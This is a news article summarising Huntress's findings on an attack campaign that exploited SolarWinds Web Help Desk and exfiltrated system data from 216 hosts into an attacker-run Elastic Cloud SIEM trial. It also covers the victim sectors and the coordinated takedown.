Cybersecurity Researchers Uncover Extensive Data Theft Campaign
Cybersecurity researchers have recently revealed a sophisticated campaign that exploits multiple software vulnerabilities, allowing threat actors to steal sensitive system data and store it within a cloud-based security platform. The alarming findings, disclosed by the cybersecurity firm Huntress, detail how attackers manipulated a free-trial instance of Elastic Cloud’s security information and event management (SIEM) platform to collect and analyze data from compromised systems spanning dozens of organizations.
The investigation unveiled that the threat actor employed a novel approach by avoiding the traditional command-and-control (C2) infrastructure typically used in such attacks. Instead, the stolen victim data was exfiltrated directly into an Elastic Cloud instance under the attacker’s control. This tactic effectively turned a legitimate security monitoring tool into a means of accumulating and storing stolen information, showcasing an unsettling use of existing technology for malicious purposes.
Leveraging Enterprise Software Vulnerabilities
Huntress researchers observed that the attackers were exploiting vulnerabilities in widely used enterprise software, most notably the SolarWinds Web Help Desk. By deploying an encoded PowerShell command on the compromised systems, the attackers efficiently gathered detailed host information, including operating system details, hardware specifications, Active Directory data, and information on installed patches. This data was then transmitted to an ElasticSearch index designated as "systeminfo."
This innovative strategy allowed the attackers to triage their victims and prioritize targets with the help of SIEM tools, which are intended for defensive security monitoring. By leveraging these tools, the threat actor was able to operate under the radar, making it more challenging for organizations to detect suspicious activities.
Elastic Cloud Deployment and Malicious Interactions
The Elastic Cloud instance utilized in this campaign was created on January 28, 2026, and remained active for several days. During this time, telemetry data indicated that the operator engaged extensively with the environment through the Kibana interface, executing hundreds of actions while examining the incoming victim data. This engagement demonstrates not only the attacker’s commitment to data collection but also their technical prowess in navigating legitimate security platforms.
Further analysis revealed that the trial account utilized a disposable email address connected to the domain quieresmail.com. Investigators deduced that the email format is associated with a Russian-registered temporary email network, firstmail.ltd, which operates multiple throwaway domains. This added another layer of sophistication to the attack, as it obscured the identities of the perpetrators.
Moreover, evidence suggested that the attacker consistently reused random eight-character identifiers across various components of their infrastructure, including both email registrations and subdomains that hosted tools on Cloudflare worker pages. Notably, administrative logins to the SIEM instance were traced back to IP addresses believed to have originated from a SAFING VPN privacy network tunnel, further complicating identification efforts.
Scope of the Campaign
Data retrieved from the attacker’s Elastic environment revealed that at least 216 hosts across 34 Active Directory domains had been compromised during this extensive campaign. A majority of the affected machines were servers, with the Windows Server 2019 and 2022 versions being the most common targets. The victims were not limited to a single sector; they spanned a wide array of organizations including:
- Government entities
- Educational institutions
- Financial services firms
- Manufacturing and automotive companies
- IT service providers and retail businesses
Some hostnames pointed to the possibility that the attacker was also exploiting vulnerabilities in additional enterprise platforms, including Microsoft SharePoint, underscoring the extensive reach of this campaign.
Collaborative Response to Cyber Threats
In response to the threat, researchers coordinated with Elastic and law enforcement agencies to alert affected organizations and take further investigative measures. The cloud instance that was exploited in the attack has since been taken offline, a step taken to mitigate further risks in the wake of the discovery.
In their blog post, Huntress stated, "We have performed outreach and victim notification to organizations that we believe were indicated within the uncovered data, and we have coordinated with Elastic in a collaborative effort to further investigate and take down this threat actor infrastructure." This proactive approach highlights the importance of community cooperation in addressing cybersecurity challenges and protecting sensitive information from being misappropriated in technology-driven environments.
The revelations serve as a stark reminder of the vulnerabilities in enterprise software and the lengths to which cybercriminals will go to exploit these weaknesses, underlining the critical need for robust cybersecurity measures and vigilant monitoring practices across all sectors.